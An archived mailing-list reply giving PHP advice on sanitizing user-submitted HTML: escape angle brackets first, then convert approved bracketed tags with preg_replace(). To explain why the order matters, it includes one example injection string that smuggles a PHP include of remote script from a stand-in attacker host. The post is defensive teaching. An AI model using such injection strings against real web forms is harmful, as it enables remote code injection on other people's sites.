TCLUG Archive

RE: [TCLUG:20490] [OT] Regexp and HTML sanitization



> I'm developing a web application with PHP and MySQL for data entry. I need
> to "sanitize" the HTML that my users enter (i.e. remove all HTML tags
> except for BR, P, IMG, etc.). I've been trying to use a regular expression
> to do this, but it's not working yet. Anyone have any suggestions? If I
> can't do it in a single regular expression, it makes the code rather
> complex.


If you want to do it simply, you might be better off borrowing a strategy from
UBB -- remove *all* HTML codes (or globally convert < and > to &lt; and &gt;),
convert newlines to <BR>, and give your users the option to use "approved" tags
by enclosing them in square brackets or something.
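A rough sketch of that first pass, in case it helps. The function name is made up for illustration, and I'm assuming the built-ins htmlspecialchars() and nl2br() are available. ENT_NOQUOTES leaves quote characters alone, so only &, < and > get converted.

```php
<?php
// Hypothetical helper: escape every angle bracket, then mark line breaks.
function escape_and_break(string $input): string
{
    // Converts & < > to entities; ENT_NOQUOTES leaves " and ' untouched.
    $escaped = htmlspecialchars($input, ENT_NOQUOTES);

    // nl2br() inserts "<br />" in front of each newline and keeps the newline.
    return nl2br($escaped);
}

echo escape_and_break("<b>hi</b>\nthere");
```

After this step nothing the user typed can open a tag, so any markup in the output has to come from the replacements you add yourself.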

e.g. [IMG SRC="/path/to/image"] is easily handled by

$output = preg_replace("/\[IMG ([^\]]+)\]/", "<IMG \\1>", $input);

(This *only* works if you globally replace the angle brackets *first* --
otherwise, a clever user could enter something like
[IMG SRC="whocares.gif"><? include "http://hax0r.com/some.random.js" ?]
and the replacement would turn it into a live <IMG> tag followed by a
<? ... ?> block.)
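To make the ordering point concrete, here is a small sketch that runs the attack string through both orders. The helper names are hypothetical. The capture group is written as [^\]]+ so that one tag cannot run on into the next.

```php
<?php
// Hypothetical helpers; only the IMG idea and the attack string come from above.

// Step 1: neutralize every angle bracket the user typed. Quotes are left
// alone so that SRC="..." inside [IMG ...] survives.
function escape_angle_brackets(string $input): string
{
    return htmlspecialchars($input, ENT_NOQUOTES);
}

// Step 2: turn the approved bracket syntax into a real tag.
function convert_img(string $input): string
{
    return preg_replace('/\[IMG ([^\]]+)\]/', '<IMG $1>', $input);
}

$attack = '[IMG SRC="whocares.gif"><? include "http://hax0r.com/some.random.js" ?]';

$unsafe = convert_img($attack);                        // brackets never escaped
$safe   = convert_img(escape_angle_brackets($attack)); // escaped first

echo $unsafe, "\n", $safe, "\n";
```

In the escaped-first result the user's > and < show up only as &gt; and &lt;, so no <? sequence is left. Note that the captured text is still copied into the tag verbatim, so a real filter would probably want a narrower pattern that accepts only a path.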

Trying to do it all in a single regexp may not be a good thing, as you'll almost
certainly have to edit that regexp over time, and it's much easier to deal with
a lot of simple regexps than a big complicated one.
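One way to keep a pile of simple regexps manageable is a pattern => replacement table. preg_replace() accepts arrays for both arguments and applies the pairs in order. The [B] and [I] tags and the function name below are made-up examples, and the input is assumed to have had its angle brackets escaped already.

```php
<?php
// Hypothetical rule table: one small pattern per approved tag.
function apply_bracket_rules(string $escaped): string
{
    $rules = [
        '/\[B\](.*?)\[\/B\]/is'     => '<B>$1</B>',
        '/\[I\](.*?)\[\/I\]/is'     => '<I>$1</I>',
        '/\[IMG SRC="([^"\]]+)"\]/i' => '<IMG SRC="$1">',
    ];

    // Patterns and replacements are paired up by position.
    return preg_replace(array_keys($rules), array_values($rules), $escaped);
}

echo apply_bracket_rules('[B]bold[/B] and [I]it[/I] [IMG SRC="/a.gif"]');
```

Adding or retiring a tag then means editing one line of the table rather than picking apart one big expression.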

Check out the docs on preg_replace() -- there's actually a good recipe for what
you're trying to do right on that page:
http://www.php3.org/manual/function.preg-replace.php
preg_replace() is much more powerful than ereg_replace() and its relatives.


--
Eric Hillman
UNIX Sysadmin/Webmaster
City & County Credit Union
ehillman@cccu.com